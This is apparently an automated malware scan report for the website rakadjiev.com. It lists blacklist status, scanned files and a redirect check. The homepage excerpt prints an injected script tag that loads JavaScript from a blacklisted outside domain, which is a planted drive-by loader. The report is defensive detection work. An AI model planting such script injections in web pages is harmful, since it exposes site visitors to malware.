Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rakadjiev.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://rakadjiev.com/ | 200 OK Content-Length: 1335 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: tropiccinema.com ...[1098 bytes skipped]... cellspacing=0> <tr><td align=center valign=middle> <a href="home.php" onmouseover="roll('rakadjiev', 'rakadjievon.jpg', '', '')" onmouseout="roll('rakadjiev', 'rakadjiev.jpg', '', '')"> <img src="rakadjiev.jpg" name="rakadjiev" border=0 valign=middle alt="Click to enter"></a></center> </td></tr> </table> </body> </html><script src="http://tropiccinema.com/info/wYyAVqhd.php?id=29855653" type="text/javascript"></script> ?>
http://rakadjiev.com/onmouseover.js | 200 OK Content-Length: 6765 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) image1 = new Image(); image1.src = "rakadjiev.jpg"; image2 = new Image(); image2.src = "rakadjievon.jpg"; image3 = new Image(); image3.src = "logo.jpg"; image4 = new Image(); image4.src = "logoon.jpg"; image5 = new Image(); image5.src = "mixes.jpg"; image6 = new Image(); image6.src = "mixeson.jpg"; image7 = new Image(); image7.src = "right.jpg"; image8 = new Image(); image8.src = "righton.jpg"; function roll(img_name1, img_src1, img Antivirus reports:
http://rakadjiev.com/wmplayer.js | 200 OK Content-Length: 7196 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIE = navigator.appName.toLowerCase().indexOf('internet explorer') + 1; Player = function(id) { this.id = id; this.o = this.getPlayer(); } Player.prototype.getPlayer = function() { var idstr = (isIE) ? this.id + "_ie" : this.id + "_moz"; var p = document.getElementById(idstr); return p; } Player.prototype.setVariable = function(name, value) { this.o.SetVariable(name, value); } Player.prototype.getVariable = function(name) { return Antivirus reports:
http://tropiccinema.com/info/wYyAVqhd.php?id=29855653 | 404 Not Found Content-Length: 653 Content-Type: text/html | clean |
http://cdn.dsultra.com/js/registrar.js | 200 OK Content-Length: 1652 Content-Type: application/x-javascript | clean |
http://tropiccinema.com/test404page.js | 404 Not Found Content-Length: 653 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rakadjiev.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 13 Oct 2014 09:04:28 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: rakadjiev.com
Referer: http://www.google.com/search?q=rakadjiev.com
Result:
The result is similar to the first query. No suspicious redirects were found.